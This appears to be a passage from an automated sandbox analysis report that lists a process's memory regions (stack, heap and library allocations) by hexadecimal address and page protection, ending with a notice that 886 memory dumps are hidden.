510E000
|
stack
|
page read and write
|
||
|
1F0000
|
trusted library section
|
page read and write
|
||
|
8DA000
|
heap
|
page read and write
|
||
|
868000
|
heap
|
page read and write
|
||
|
17A000
|
trusted library allocation
|
page execute and read and write
|
||
|
EE2000
|
trusted library allocation
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
20DD000
|
stack
|
page read and write
|
||
|
4E7D000
|
stack
|
page read and write
|
||
|
EE0000
|
trusted library allocation
|
page read and write
|
||
|
233E000
|
trusted library allocation
|
page read and write
|
||
|
5BFD000
|
stack
|
page read and write
|
||
|
208000
|
trusted library allocation
|
page read and write
|
||
|
2DE000
|
stack
|
page read and write | page guard
|
||
|
650000
|
heap
|
page execute and read and write
|
||
|
3129000
|
trusted library allocation
|
page read and write
|
||
|
4CCC000
|
stack
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
59AD000
|
heap
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
5820000
|
heap
|
page read and write
|
||
|
470000
|
trusted library allocation
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
2425000
|
trusted library allocation
|
page read and write
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
5CBE000
|
stack
|
page read and write
|
||
|
4710000
|
heap
|
page execute and read and write
|
||
|
542E000
|
stack
|
page read and write
|
||
|
554D000
|
stack
|
page read and write
|
||
|
1E9F000
|
stack
|
page read and write
|
||
|
237A000
|
trusted library allocation
|
page read and write
|
||
|
5A0F000
|
stack
|
page read and write
|
||
|
260000
|
trusted library allocation
|
page read and write
|
||
|
2490000
|
trusted library allocation
|
page read and write
|
||
|
140000
|
trusted library allocation
|
page read and write
|
||
|
5C10000
|
heap
|
page read and write
|
||
|
2060000
|
heap
|
page execute and read and write
|
||
|
5047000
|
heap
|
page read and write
|
||
|
6460000
|
heap
|
page read and write
|
||
|
760000
|
heap
|
page execute and read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
5610000
|
heap
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
22C0000
|
trusted library allocation
|
page read and write
|
||
|
2E8E000
|
stack
|
page read and write
|
||
|
2021000
|
heap
|
page read and write
|
||
|
A0F000
|
stack
|
page read and write
|
||
|
247C000
|
trusted library allocation
|
page read and write
|
||
|
2289000
|
trusted library allocation
|
page read and write
|
||
|
564000
|
heap
|
page read and write
|
||
|
4BE000
|
heap
|
page read and write
|
||
|
813000
|
heap
|
page read and write
|
||
|
5A1E000
|
stack
|
page read and write
|
||
|
8BF000
|
heap
|
page read and write
|
||
|
8E1000
|
heap
|
page read and write
|
||
|
3CE000
|
stack
|
page read and write
|
||
|
4FFE000
|
stack
|
page read and write
|
||
|
330000
|
heap
|
page execute and read and write
|
||
|
123000
|
trusted library allocation
|
page execute and read and write
|
||
|
884000
|
heap
|
page read and write
|
||
|
888000
|
heap
|
page read and write
|
||
|
2B34000
|
heap
|
page read and write
|
||
|
200000
|
heap
|
page execute and read and write
|
||
|
4D60000
|
heap
|
page read and write
|
||
|
3F0000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page execute and read and write
|
||
|
23F1000
|
trusted library allocation
|
page read and write
|
||
|
CB000
|
stack
|
page read and write
|
||
|
2480000
|
trusted library allocation
|
page read and write
|
||
|
89B000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
377000
|
heap
|
page read and write
|
||
|
8C5000
|
heap
|
page read and write
|
||
|
5FBE000
|
stack
|
page read and write
|
||
|
6302000
|
trusted library allocation
|
page read and write
|
||
|
5864000
|
heap
|
page read and write
|
||
|
4730000
|
heap
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
248C000
|
trusted library allocation
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
302000
|
heap
|
page read and write
|
||
|
2390000
|
trusted library allocation
|
page read and write
|
||
|
221F000
|
stack
|
page read and write
|
||
|
8B4000
|
heap
|
page read and write
|
||
|
4B6E000
|
stack
|
page read and write
|
||
|
8C9000
|
heap
|
page read and write
|
||
|
6322000
|
trusted library allocation
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
There are 886 hidden memdumps, click here to show them.